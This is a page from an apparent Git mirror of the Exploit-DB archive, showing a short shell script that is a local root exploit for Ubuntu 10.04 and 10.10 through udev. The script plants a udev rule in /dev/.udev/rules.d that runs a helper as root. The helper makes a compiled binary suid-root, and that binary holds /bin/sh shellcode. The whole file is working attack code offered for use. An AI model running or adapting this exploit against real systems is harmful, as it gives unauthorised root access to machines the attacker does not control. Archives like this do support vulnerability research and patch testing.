bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/15074.sh
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

26 lines
No EOL
905 B
Bash
Executable file
Raw Permalink Blame History

# source: https://www.securityfocus.com/bid/43084/info
#!/bin/sh
# by fuzz. For Anux inc. #
# ubuntu 10.04 , 10.10
if [ -z "$1" ]
then
echo "usage: $0 <UDEV KERNEL EVENT>"
echo "see here http://www.reactivated.net/writing_udev_rules.html"
exit
fi
cat > usn985-exploit.sh << EOF
#!/bin/sh
chown root:root $PWD/usn985-sc
chmod +s $PWD/usn985-sc
EOF
cat > usn985-sc.c << EOF
char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
main(){int *r;*((int *)&r+2)=(int)s;}
EOF
gcc usn985-sc.c -o usn985-sc
echo "KERNEL==\"$1\", RUN+=\"$PWD/usn985-exploit.sh\"" >> /dev/.udev/rules.d/root.rules
chmod +x usn985-exploit.sh
echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)"
echo "Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root"
Reference in a new issue View git blame Copy permalink